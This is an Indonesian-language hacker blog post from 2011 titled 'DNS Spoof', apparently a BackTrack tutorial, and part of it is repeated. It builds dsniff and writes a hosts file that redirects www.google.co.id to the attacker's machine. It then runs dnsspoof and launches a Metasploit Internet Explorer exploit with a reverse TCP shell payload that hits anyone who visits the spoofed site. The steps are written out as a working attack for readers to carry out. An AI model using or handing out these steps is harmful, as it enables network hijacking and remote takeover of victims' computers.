~!6li3z ~!~ 3xpl0it5~

[chevssites@back|track]# ls

DNS Spoof

0 comments | 1/12/11

langkah pertama download http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

root@bt:~# wget -c http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
--2011-02-15 12:20:51-- http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
Resolving www.monkey.org... 75.102.5.19
Connecting to www.monkey.org|75.102.5.19|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 126797 (124K) [application/x-gzip]
Saving to: `dsniff-2.3.tar.gz'

100%[======================================>] 126,797 32.3K/s in 3.8s

2011-02-15 12:20:55 (32.3 KB/s) - `dsniff-2.3.tar.gz' saved [126797/126797]

Extrak file Tar.gz ::

root@bt:~# tar zxvf dsniff-2.3.tar.gz

dsniff-2.3/CVS
dsniff-2.3/CVS/Root
dsniff-2.3/CVS/Repository
dsniff-2.3/CVS/Entries
dsniff-2.3/Makefile.in
dsniff-2.3/CHANGES
dsniff-2.3/LICENSE
dsniff-2.3/asn1.c
dsniff-2.3/README
dsniff-2.3/macof.c
dsniff-2.3/missing
dsniff-2.3/missing/strlcat.c
dsniff-2.3/missing/strlcpy.c
dsniff-2.3/missing/dirname.c
dsniff-2.3/missing/ethers.c
dsniff-2.3/missing/md5.c
dsniff-2.3/missing/md5.h
dsniff-2.3/missing/CVS
dsniff-2.3/missing/CVS/Root
dsniff-2.3/missing/CVS/Repository
dsniff-2.3/missing/CVS/Entries
dsniff-2.3/missing/err.c
dsniff-2.3/missing/err.h
dsniff-2.3/missing/sys
dsniff-2.3/missing/sys/queue.h
dsniff-2.3/missing/sys/CVS
dsniff-2.3/missing/sys/CVS/Root
dsniff-2.3/missing/sys/CVS/Repository
dsniff-2.3/missing/sys/CVS/Entries
dsniff-2.3/missing/libgen.h
dsniff-2.3/missing/strsep.c
dsniff-2.3/missing/dummy.c
dsniff-2.3/missing/memcmp.c
dsniff-2.3/macof.8
dsniff-2.3/base64.c
dsniff-2.3/decode.c
dsniff-2.3/decode_aim.c
dsniff-2.3/decode_citrix.c
dsniff-2.3/decode_http.c
dsniff-2.3/acconfig.h
dsniff-2.3/decode_cvs.c
dsniff-2.3/decode_ftp.c
dsniff-2.3/configure.in
dsniff-2.3/install-sh
dsniff-2.3/configure
dsniff-2.3/decode_icq.c
dsniff-2.3/config.h.in
dsniff-2.3/dsniff.c
dsniff-2.3/decode_imap.c
dsniff-2.3/decode_irc.c
dsniff-2.3/decode_ldap.c
dsniff-2.3/tcp_raw.c
dsniff-2.3/decode_mountd.c
dsniff-2.3/decode_napster.c
dsniff-2.3/decode_nntp.c
dsniff-2.3/decode_oracle.c
dsniff-2.3/decode_ospf.c
dsniff-2.3/decode_pcanywhere.c
dsniff-2.3/decode_pop.c
dsniff-2.3/decode_portmap.c
dsniff-2.3/decode_rip.c
dsniff-2.3/decode_rlogin.c
dsniff-2.3/decode_smb.c
dsniff-2.3/decode_sniffer.c
dsniff-2.3/decode_snmp.c
dsniff-2.3/decode_socks.c
dsniff-2.3/decode_telnet.c
dsniff-2.3/decode_x11.c
dsniff-2.3/rpc.c
dsniff-2.3/record.c
dsniff-2.3/trigger.c
dsniff-2.3/magic.c
dsniff-2.3/asn1.h
dsniff-2.3/base64.h
dsniff-2.3/decode.h
dsniff-2.3/options.h
dsniff-2.3/record.h
dsniff-2.3/rpc.h
dsniff-2.3/trigger.h
dsniff-2.3/arp.c
dsniff-2.3/hex.c
dsniff-2.3/hex.h
dsniff-2.3/mailsnarf.c
dsniff-2.3/filesnarf.c
dsniff-2.3/mount.x
dsniff-2.3/remote.c
dsniff-2.3/tcpkill.c
dsniff-2.3/tcpnice.c
dsniff-2.3/urlsnarf.c
dsniff-2.3/version.h
dsniff-2.3/vroot.h
dsniff-2.3/webspy.c
dsniff-2.3/arpspoof.c
dsniff-2.3/dsniff.8
dsniff-2.3/dnsspoof.8
dsniff-2.3/mailsnarf.8
dsniff-2.3/buf.h
dsniff-2.3/tcpkill.8
dsniff-2.3/tcpnice.8
dsniff-2.3/urlsnarf.8
dsniff-2.3/webspy.8
dsniff-2.3/decode_mmxp.c
dsniff-2.3/decode_smtp.c
dsniff-2.3/tcp_raw.h
dsniff-2.3/dsniff.magic
dsniff-2.3/pcaputil.h
dsniff-2.3/decode_tds.c
dsniff-2.3/nfs_prot.x
dsniff-2.3/dsniff.services
dsniff-2.3/decode_postgresql.c
dsniff-2.3/buf.c
dsniff-2.3/msgsnarf.c
dsniff-2.3/dnsspoof.c
dsniff-2.3/magic.h
dsniff-2.3/pathnames.h
dsniff-2.3/sshcrypto.c
dsniff-2.3/webmitm.8
dsniff-2.3/sshmitm.c
dsniff-2.3/decode_yp.c
dsniff-2.3/filesnarf.8
dsniff-2.3/arpspoof.8
dsniff-2.3/pcaputil.c
dsniff-2.3/msgsnarf.8
dsniff-2.3/decode_vrrp.c
dsniff-2.3/TODO
dsniff-2.3/decode_hex.c
dsniff-2.3/webmitm.c
dsniff-2.3/ssh.h
dsniff-2.3/ssh.c
dsniff-2.3/sshcrypto.h
dsniff-2.3/sshmitm.8
dsniff-2.3/.cvsignore
dsniff-2.3/decode_pptp.c
dsniff-2.3/dnsspoof.hosts

root@bt:~/dsniff-2.3# ./configure
creating cache ./config.cache
checking for gcc... gcc
checking whether the C compiler (gcc ) works... yes
checking whether the C compiler (gcc ) is a cross-compiler... no
checking whether we are using GNU C... yes
checking whether gcc accepts -g... yes
checking for a BSD compatible install... /usr/bin/install -c
checking for ranlib... ranlib
checking how to run the C preprocessor... gcc -E
checking for X... libraries , headers
checking for dnet_ntoa in -ldnet... no
checking for dnet_ntoa in -ldnet_stub... no
checking for gethostbyname... yes
checking for connect... yes
checking for remove... yes
checking for shmat... yes
checking for IceConnectionNumber in -lICE... yes
checking for ANSI C header files... yes
checking for err.h... yes
checking for fcntl.h... yes
checking for sys/ioctl.h... yes
checking for sys/queue.h... yes
checking for unistd.h... yes
checking for libgen.h... yes
checking for net/if_tun.h... no
checking for MIN and MAX in sys/param.h... yes
checking for working const... yes
checking for size_t... yes
checking whether struct tm is in sys/time.h or time.h... time.h
checking for u_int32_t... yes
checking for u_int64_t... yes
checking for in_addr_t... no
checking whether gcc needs -traditional... no
checking for 8-bit clean memcmp... yes
checking return type of signal handlers... void
checking for strftime... yes
checking for gethostname... yes
checking for socket... yes
checking for strdup... yes
checking for strstr... yes
checking for xdr_fhstatus in -lrpcsvc... yes
checking for socket in -lsocket... no
checking for gethostbyname in -lnsl... yes
checking for dn_expand in -lresolv... yes
checking for dirname... yes
checking for strlcpy... no
checking for strlcat... no
checking for strsep... yes
checking for MD5Update... no
checking for warnx... yes
checking for ether_ntoa... yes
checking for Berkeley DB with 1.85 compatibility... configure: error: Berkeley DB with 1.85 compatibility not found

root@bt# ./make && make install

# echo 192.168.1.110 www.google.co.id > hostfile

dimana 192.168.1.110 adalah alamat ip yang sedang kita gunakan
dan www.google.co.id adalah alamat dns yang akan dipalsukan

# dnsspoof -i eth0 -f hosfile

-i adalah parameter untuk kartu jaringan yang digunakan dengan nama eth0 (jika menggunakan wifi rausb0 atau wlan0)
-f adalah tempat atau nama file yang sebelumnya dibuat dengan perintah echo

gunakan metasploit untuk memanfaatkan kelemahan IE yang sedang membuka http://www.google.co.id
# ./msfcli exploit/windows/browser/ms06_013_createtextrange

SRVHOST=192.168.1.110 SRVPORT=80 PAYLOAD=generic/shell_reverse_tcp LHOST=192.168.1.110 E

saya yakin bahwa anda sudah mengerti cara menggunakan metasploit frameworker 3 ini
tunggu sampai ada salah satu komputer yang sedang membuka http://www.google.co.id

nice spoofing.......^_^

Labels: backtrack

posted by acep saepudin at 12:17 PM Permalink

0 Comments:

DNS Spoof

0 comments | 1/12/11

Extrak file Tar.gz ::

root@bt:~# tar zxvf dsniff-2.3.tar.gz

root@bt# ./make && make install

# echo 192.168.1.110 www.google.co.id > hostfile

dimana 192.168.1.110 adalah alamat ip yang sedang kita gunakan
dan www.google.co.id adalah alamat dns yang akan dipalsukan

# dnsspoof -i eth0 -f hosfile

SRVHOST=192.168.1.110 SRVPORT=80 PAYLOAD=generic/shell_reverse_tcp LHOST=192.168.1.110 E

saya yakin bahwa anda sudah mengerti cara menggunakan metasploit frameworker 3 ini
tunggu sampai ada salah satu komputer yang sedang membuka http://www.google.co.id

nice spoofing.......^_^

Labels: backtrack

posted by acep saepudin at 12:17 PM Permalink

☺☻♥♦♣♠•◘○◙♂♀............. chev's site's .............. ☺☻♥♦♣♠•◘○♀↨-8

DNS Spoof

0 Comments:

Post a Comment

Previous Posts

DNS Spoof

0 Comments:

Post a Comment

Previous Posts